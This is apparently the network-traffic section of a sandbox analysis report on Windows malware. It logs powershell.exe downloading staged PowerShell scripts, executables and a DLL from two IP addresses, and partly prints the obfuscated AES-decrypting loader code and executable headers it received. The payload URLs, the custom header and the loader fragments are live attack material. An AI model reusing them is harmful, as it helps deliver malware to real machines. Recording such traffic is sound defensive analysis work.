Jan 2, 2025 19:14:16.683240891 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.683240891 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.733617067 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.733623981 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.733630896 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.733680964 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.733711958 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.733715057 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.733720064 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.733722925 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.733728886 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.733755112 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.733761072 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.733772039 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.733772993 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.733779907 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.733797073 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.733820915 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.733820915 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.733824968 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.733833075 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.733839989 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.733844995 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.733851910 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.733866930 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.733900070 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.733938932 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.733946085 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.733958006 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.733963013 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.733969927 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.733975887 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.733987093 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.733993053 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.733999014 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734004974 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734025002 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.734025002 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.734041929 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.734076023 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734081984 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734093904 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734100103 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734106064 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734118938 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734124899 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734128952 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.734131098 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734147072 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734152079 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734158993 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734159946 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.734165907 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734179020 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.734194994 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.734205008 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.734214067 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734229088 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734235048 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734245062 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734261036 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.734313965 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.734469891 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734477043 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734483004 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734488964 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734494925 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734500885 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734507084 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734512091 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734518051 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734523058 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734529018 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734529972 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.734570026 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.734570980 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.734922886 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734929085 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734941959 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734955072 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734961033 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734966040 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734972000 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734977007 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734982014 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.734982967 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.734988928 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.735008001 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.735021114 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.735101938 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.931148052 CET	49721	80	192.168.2.5	147.45.44.131

HTTP Request Dependency Graph

185.149.146.164

147.45.44.131

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49714	185.149.146.164	80	2180	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 19:14:08.382884979 CET	169	OUT	GET /wrcaf.ps1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 185.149.146.164 Connection: Keep-Alive
Jan 2, 2025 19:14:09.008609056 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Thu, 02 Jan 2025 18:14:08 GMT Content-Type: application/octet-stream Content-Length: 2469 Last-Modified: Thu, 02 Jan 2025 11:48:34 GMT Connection: keep-alive ETag: "67767d12-9a5" Content-Disposition: attachment; filename=wrcaf.ps1 Accept-Ranges: bytes Data Raw: 0d 0a 24 4a 33 56 70 6b 20 3d 20 27 49 69 30 52 54 62 47 7a 7a 55 45 76 79 4e 6f 34 42 76 33 2b 35 36 35 61 73 6e 75 65 37 51 64 63 66 45 43 55 55 4c 57 63 35 76 30 3d 27 0d 0a 24 66 54 4d 68 47 20 3d 20 27 54 49 6a 59 2b 6d 43 6f 79 71 72 2f 55 69 36 39 42 36 72 32 36 67 3d 3d 27 0d 0a 24 37 35 57 54 52 20 3d 20 27 70 6a 4b 70 6c 6e 62 32 6f 6c 4f 79 57 52 6d 46 66 2b 51 2f 73 50 50 79 43 33 6c 45 4f 4c 49 47 4f 66 31 42 48 63 4e 67 4c 71 47 68 31 4b 6a 6d 47 48 32 57 67 65 36 62 66 46 6f 63 30 32 2f 74 68 58 6b 38 41 4f 47 52 75 41 33 37 2f 4d 71 5a 67 55 4d 65 35 4f 33 51 66 52 67 61 66 32 55 2f 37 37 71 5a 76 78 36 78 7a 59 6a 56 77 70 71 6d 5a 43 55 62 63 49 72 64 49 50 68 41 39 55 50 2f 76 41 50 31 34 49 71 58 2f 58 51 4b 42 66 45 46 73 73 30 33 38 56 74 30 35 6f 6b 36 75 67 43 65 6e 6b 6f 61 32 78 44 51 45 70 52 41 38 63 6e 31 53 4a 64 35 77 56 2b 45 4b 58 31 57 52 51 6a 38 73 58 5a 31 6a 55 72 79 52 79 6d 58 74 53 54 46 6b 34 6a 4f 6a 6e 71 32 6c 66 63 41 63 6e 38 62 69 2b 59 53 71 2f 38 70 [TRUNCATED] Data Ascii: $J3Vpk = 'Ii0RTbGzzUEvyNo4Bv3+565asnue7QdcfECUULWc5v0='$fTMhG = 'TIjY+mCoyqr/Ui69B6r26g=='$75WTR = 'pjKplnb2olOyWRmFf+Q/sPPyC3lEOLIGOf1BHcNgLqGh1KjmGH2Wge6bfFoc02/thXk8AOGRuA37/MqZgUMe5O3QfRgaf2U/77qZvx6xzYjVwpqmZCUbcIrdIPhA9UP/vAP14IqX/XQKBfEFss038Vt05ok6ugCenkoa2xDQEpRA8cn1SJd5wV+EKX1WRQj8sXZ1jUryRymXtSTFk4jOjnq2lfcAcn8bi+YSq/8pqoRffq/XsRnuV9B9PzWjDLSiQQjuwzo+3VwJdE1qVUYhusxNiAuHSneiZ9Qmsl0joeQIw/vrkdmjNcH54fjjPrfEwG3JiA03BAzamigEVrnU9pst+KyLeDc231Xu4q/Y9y5E5MmkvD5tCp2BKBNSxOItN1zTCA2W1lRg2XNwQ6uUaNOmohob1dq91GZSxFCketl12td+wnQF12OFdrXQ4cK4fx9g2lMztjfCCf+8fD1W0NMeRMhyhL58hKSJXz1taKeYBsn8bGneBJxZOR49IRKdW6O0xNkJT2mQu0Q/byaorbHcL6HxWbRQuJGLKzrsQs0DT+K4e4W+YESktGZvW0q9SHTkltRzKp5PToI0/vvF5X1joTw2/ihGk5/UvsEXWhLU1m2WFFVLbNQhYlTw7+waFp+AwJyQGy19uiJS6fri/7KxOUTYO3Ex+JwnNnCmj52KMsBUI66WtUUFDC95y2wRT2nZyalRrvmrNhiJ/4OUitkrtb4pXhk0FZGboYDqfXuSdswRWNk1uTffhidMJUlHxsuUmzmjhchbaxxbUEJju362F7HJYTIalr2OnpzVBiqvw/rtftZ5Hau
Jan 2, 2025 19:14:09.008678913 CET	1236	IN	Data Raw: 31 42 4f 79 6b 30 6a 6e 75 4a 36 34 68 63 38 67 57 46 51 4e 4d 6c 6c 70 64 52 6c 59 48 45 43 41 74 58 64 58 48 77 2f 67 73 6e 57 79 55 67 47 32 66 4a 50 55 38 4f 4e 50 4c 73 4d 51 64 43 6a 38 41 6a 7a 67 58 51 4f 54 2f 70 36 44 6a 2b 30 71 6a 69 Data Ascii: 1BOyk0jnuJ64hc8gWFQNMllpdRlYHECAtXdXHw/gsnWyUgG2fJPU8ONPLsMQdCj8AjzgXQOT/p6Dj+0qjiTamTvyVuzBCRo7JHuXhE4Etppj3olyZm5P9I5tUwOq/XZdrWK1O32gG3SX1Kd8iqSI6Uq+a6S3OUV3aHu4B2Il0Yfjquw0QWhvUi8i55meoaiDwARyszw/tB5Dl4B6TWRczh0/FsU9H2KTyI7Cck2ekyGDrxBdEsk
Jan 2, 2025 19:14:09.008691072 CET	304	IN	Data Raw: 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 2e 43 72 79 70 74 6f 53 74 72 65 61 6d 4d 6f 64 65 5d 3a 3a 52 65 61 64 29 0d 0a 20 20 20 20 24 76 79 6d 54 61 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 49 4f 2e 53 Data Ascii: ecurity.Cryptography.CryptoStreamMode]::Read) $vymTa = New-Object System.IO.StreamReader($lGR9E) $p6NOz = $vymTa.ReadToEnd() $vymTa.Close() $lGR9E.Close() $39DGA.Close() return $p6NOz}$IVyDo = XeZIT -OSgCW $

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49716	147.45.44.131	80	2180	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 19:14:09.233508110 CET	275	OUT	GET /infopage/file.exe HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 147.45.44.131 Connection: Keep-Alive
Jan 2, 2025 19:14:09.861555099 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 18:14:09 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 02 Jan 2025 11:05:36 GMT ETag: "325e0-62ab7244bf291" Accept-Ranges: bytes Content-Length: 206304 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ae 14 73 f9 ea 75 1d aa ea 75 1d aa ea 75 1d aa fe 1e 1e ab e2 75 1d aa fe 1e 1c ab fd 75 1d aa ea 75 1c aa ae 77 1d aa fe 1e 18 ab c4 75 1d aa fe 1e 19 ab a5 75 1d aa fe 1e e2 aa eb 75 1d aa fe 1e 1f ab eb 75 1d aa 52 69 63 68 ea 75 1d aa 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e2 9e e4 2e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 14 00 16 02 00 00 f2 00 00 00 00 00 00 a0 f0 01 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 05 00 01 00 00 00 00 00 00 30 03 00 00 04 00 00 26 47 03 00 02 00 40 c1 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$suuuuuuwuuuuRichuPEL.0@0&G@ tH`!TH@@l.textT `.datat0@.idata,@"@@.rsrc`@@@.reloc,@B
Jan 2, 2025 19:14:09.861597061 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: A@@@ApAA`P`pP
Jan 2, 2025 19:14:09.861620903 CET	1236	IN	Data Raw: 00 00 60 92 01 00 00 70 92 01 00 00 b0 92 01 00 00 e0 92 01 00 00 50 93 01 00 00 70 93 01 00 00 80 93 01 00 00 20 95 01 00 00 50 95 01 00 00 80 95 01 00 00 b0 95 01 00 00 c0 95 01 00 00 d0 95 01 00 00 10 96 01 00 00 d0 b3 01 00 00 00 b4 01 00 00 Data Ascii: `pPp P 0 `p `P` 0@
Jan 2, 2025 19:14:09.861639023 CET	1236	IN	Data Raw: 00 90 fb 01 00 00 00 fe 01 00 00 e0 13 02 00 00 00 14 02 00 00 00 00 00 d4 47 02 00 00 00 00 00 00 00 00 00 00 00 00 00 5f 5f 54 45 53 54 43 4f 44 45 5f 5f 00 00 00 00 82 4f 45 64 27 f8 ce 11 90 59 08 00 36 f1 25 02 ba e5 37 fc 8e 4a ce 11 87 0b Data Ascii: G__TESTCODE__OEd'Y6%7J6#@@@`@@x@A@`@P@`@AAAAAAA@AAA A0A@APA`ApA@A
Jan 2, 2025 19:14:09.861649990 CET	1236	IN	Data Raw: 6c 00 20 00 41 00 6e 00 74 00 6f 00 6e 00 69 00 6f 00 00 00 43 00 6f 00 43 00 72 00 65 00 61 00 74 00 65 00 49 00 6e 00 73 00 74 00 61 00 6e 00 63 00 65 00 20 00 66 00 61 00 69 00 6c 00 65 00 64 00 20 00 75 00 73 00 69 00 6e 00 67 00 20 00 74 00 Data Ascii: l AntonioCoCreateInstance failed using the CLSID for '%s'The command line (%s) does not contain a valid persistent OL
Jan 2, 2025 19:14:09.861660957 CET	1236	IN	Data Raw: 79 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 6f 00 72 00 20 00 66 00 61 00 69 00 6c 00 65 00 64 00 2e 00 00 00 43 00 53 00 65 00 63 00 75 00 72 00 69 00 74 00 79 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 6f 00 72 00 3a 00 3a 00 Data Ascii: yDescriptor failed.CSecurityDescriptor::Initialize failed.SystempsdSelfRelative malloc failed.Cannot AccessAccess
Jan 2, 2025 19:14:09.861677885 CET	1236	IN	Data Raw: 49 00 6e 00 74 00 65 00 72 00 61 00 63 00 74 00 69 00 76 00 65 00 20 00 55 00 73 00 65 00 72 00 00 00 00 00 52 00 75 00 6e 00 41 00 73 00 00 00 00 00 00 00 4e 00 00 00 fd ff 00 00 70 00 00 00 70 00 00 00 26 00 00 00 d0 ce 40 00 4e 00 00 00 fc ff Data Ascii: Interactive UserRunAsNpp&@Npp&@@'@t@A@`@P@`@AAAAAAA@AAA A0A@APA`ApA A0A@APA`A
Jan 2, 2025 19:14:09.861689091 CET	1236	IN	Data Raw: d0 de 41 00 e0 de 41 00 10 da 40 00 f0 de 41 00 00 df 41 00 10 df 41 00 20 df 41 00 30 df 41 00 40 df 41 00 50 df 41 00 60 df 41 00 70 df 41 00 20 e1 41 00 a0 e5 41 00 40 e1 41 00 70 e1 40 00 40 e5 41 00 70 e1 41 00 00 e5 41 00 a0 e1 41 00 b0 e1 Data Ascii: AA@AAA A0A@APA`ApA AA@Ap@@ApAAAAAAAA@@@AA A0A@A A`ApAAA@A`ApAPA`ApAAAAPA0@AA@AAAAAARegist
Jan 2, 2025 19:14:09.861702919 CET	1236	IN	Data Raw: a0 e6 41 00 b0 e6 41 00 c0 e6 41 00 d0 e6 41 00 e0 e6 41 00 44 00 45 00 46 00 41 00 55 00 4c 00 54 00 41 00 43 00 43 00 45 00 53 00 53 00 50 00 45 00 52 00 4d 00 49 00 53 00 53 00 49 00 4f 00 4e 00 00 00 53 00 4f 00 46 00 54 00 57 00 41 00 52 00 Data Ascii: AAAAADEFAULTACCESSPERMISSIONSOFTWARE\MICROSOFT\OLEGlobal AccessAll classesDefaultAccessPermission2@@@
Jan 2, 2025 19:14:09.861715078 CET	1236	IN	Data Raw: 70 df 41 00 20 e1 41 00 30 e1 41 00 40 e1 41 00 50 e1 41 00 60 e1 41 00 70 e1 41 00 80 e1 41 00 a0 e1 41 00 e0 e8 41 00 c0 e1 41 00 d0 e8 41 00 e0 e1 41 00 f0 e1 41 00 60 b4 40 00 10 c6 40 00 80 c6 40 00 b0 e8 41 00 10 e2 41 00 20 e2 41 00 30 e2 Data Ascii: pA A0A@APA`ApAAAAAAAA`@@@AA A0A@APA`ApAAAAAp@System ConfigurationFF8@@@
Jan 2, 2025 19:14:09.866547108 CET	1236	IN	Data Raw: 65 00 6c 00 00 00 00 00 44 00 6c 00 6c 00 53 00 75 00 72 00 72 00 6f 00 67 00 61 00 74 00 65 00 00 00 00 00 4c 00 6f 00 63 00 61 00 6c 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 00 00 00 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 50 00 61 00 Data Ascii: elDllSurrogateLocalServiceServiceParametersInProcHandler32TreatAsAppIDMSJAVA.DLLBOTHFREEAPARTMENTNEUTRAL
Jan 2, 2025 19:14:10.556200027 CET	255	OUT	GET /infopage/iviewers.dll HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 147.45.44.131
Jan 2, 2025 19:14:10.738917112 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 18:14:10 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 02 Jan 2025 11:05:39 GMT ETag: "16000-62ab724726645" Accept-Ranges: bytes Content-Length: 90112 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7f 78 25 53 3b 19 4b 00 3b 19 4b 00 3b 19 4b 00 70 61 48 01 31 19 4b 00 70 61 4e 01 a8 19 4b 00 70 61 4f 01 2f 19 4b 00 3d 98 4e 01 24 19 4b 00 3d 98 4f 01 2a 19 4b 00 3d 98 48 01 2f 19 4b 00 70 61 4a 01 38 19 4b 00 3b 19 4a 00 6e 19 4b 00 56 98 42 01 3a 19 4b 00 56 98 4b 01 3a 19 4b 00 56 98 b4 00 3a 19 4b 00 56 98 49 01 3a 19 4b 00 52 69 63 68 3b 19 4b 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 72 76 67 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 26 00 de 00 00 00 88 00 00 00 00 00 00 63 13 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$x%S;K;K;KpaH1KpaNKpaO/K=N$K=O*K=H/KpaJ8K;JnKVB:KVK:KV:KVI:KRich;KPELrvg!&c@JT$K(,>p=@ .text `.rdataab@@.data<`D@.rsrcN@@.reloc,P@B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49721	147.45.44.131	80	2276	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 19:14:12.491224051 CET	275	OUT	GET /infopage/iubn.ps1 HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 147.45.44.131 Connection: Keep-Alive
Jan 2, 2025 19:14:13.091254950 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 18:14:13 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 02 Jan 2025 11:02:00 GMT ETag: "692-62ab7176e913d" Accept-Ranges: bytes Content-Length: 1682 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Data Raw: 0d 0a 24 78 6e 68 43 58 44 20 3d 20 27 37 49 5a 77 45 41 74 6f 6a 32 79 42 37 6e 71 55 4f 44 63 34 63 73 68 37 6c 54 36 32 71 2b 78 74 7a 49 56 61 75 30 35 70 57 75 67 3d 27 0d 0a 24 73 51 55 56 70 68 20 3d 20 27 69 46 41 69 38 65 6a 46 66 4b 70 67 44 51 38 59 39 59 63 31 6b 67 3d 3d 27 0d 0a 24 78 42 41 4f 4a 36 20 3d 20 27 42 59 59 76 48 54 65 50 7a 37 6a 4b 67 64 4c 5a 5a 69 4a 59 64 42 6a 4d 44 65 70 35 59 48 4a 68 4b 69 31 5a 63 44 36 57 52 48 37 4d 43 43 41 30 76 36 61 38 53 61 6d 4a 62 64 39 39 38 36 77 6b 47 37 57 44 46 5a 31 4c 7a 31 68 2b 6a 4e 66 4e 62 32 4f 63 43 73 50 78 37 61 33 6d 69 4a 50 4a 6e 61 6a 48 43 6c 32 50 72 66 76 68 56 35 2b 67 32 79 6e 4d 2f 4e 33 2b 62 42 6e 75 67 5a 74 51 57 71 54 39 69 47 4b 45 45 79 42 59 46 52 48 76 4d 4e 75 45 65 49 53 73 73 4b 39 50 35 50 75 54 71 58 6e 47 53 4a 41 59 35 53 4b 74 75 42 72 33 62 49 47 72 58 67 76 62 44 36 34 33 38 47 2f 52 69 4c 76 41 56 62 74 75 62 42 67 2b 41 6a 55 6a 50 50 71 52 6f 68 65 71 64 33 52 57 64 41 64 30 46 75 77 36 74 [TRUNCATED] Data Ascii: $xnhCXD = '7IZwEAtoj2yB7nqUODc4csh7lT62q+xtzIVau05pWug='$sQUVph = 'iFAi8ejFfKpgDQ8Y9Yc1kg=='$xBAOJ6 = 'BYYvHTePz7jKgdLZZiJYdBjMDep5YHJhKi1ZcD6WRH7MCCA0v6a8SamJbd9986wkG7WDFZ1Lz1h+jNfNb2OcCsPx7a3miJPJnajHCl2PrfvhV5+g2ynM/N3+bBnugZtQWqT9iGKEEyBYFRHvMNuEeISssK9P5PuTqXnGSJAY5SKtuBr3bIGrXgvbD6438G/RiLvAVbtubBg+AjUjPPqRoheqd3RWdAd0Fuw6tbc1izmf2qr//8v0N37ZU2czNGy72ieWxUGjaSdsxkihCw4YzmAoXxnOfjp9PcvRPkiF7jk48y557ClG4KB2SCJppKm4CLjs/ELQLlLz080Yl/jKEcrrChjGtoyt23k+5QsiTD3SRucv4bE29K13Zv5yWdsu0vag5jDFoJewWwJXs8xKpm4KKUE/2PV9Fcgw4W718pvDKv7aa5DInMcuvcSttl9Chq0ZFHiZfOYCI963DVfPurlPSy6yvxEynyfXzcYYJEO44N34cO+LRf7tH8CrFITJubaVvnW/Ou7KjS9o9LRlHEBseLEbOMMPg/vKbrueI6K/KoYb2hL+e9SDk/aeDrY0II0FRFETCaEQnJBfOubpU03wCHQRMMH7iz1NVC/X26gPZWyRRK+RdhthfQQS8LLX'function a10NrR ($o5pQm1, $xnhCXD, $sQUVph) { $4MGiFV = [Convert]::FromBase64String($xnhCXD) $OJ5UPJ = [Convert]::FromBase64String($sQUVph) $T9tJ95 = [Convert]::FromBase64String($o5pQm1) $9mUXlj = [Sys
Jan 2, 2025 19:14:13.091274977 CET	707	IN	Data Raw: 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 2e 41 65 73 5d 3a 3a 43 72 65 61 74 65 28 29 0d 0a 20 20 20 20 24 39 6d 55 58 6c 6a 2e 4b 65 79 20 3d 20 24 34 4d 47 69 46 56 0d 0a 20 20 20 20 24 39 6d 55 58 6c 6a 2e 49 Data Ascii: tem.Security.Cryptography.Aes]::Create() $9mUXlj.Key = $4MGiFV $9mUXlj.IV = $OJ5UPJ $9mUXlj.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $S1QRYq = $9mUXlj.CreateDecryptor($9mUXlj.Key, $9mUXlj.IV) $NKtx2h
Jan 2, 2025 19:14:13.326118946 CET	157	OUT	GET /infopage/rwvg1.exe HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq Host: 147.45.44.131
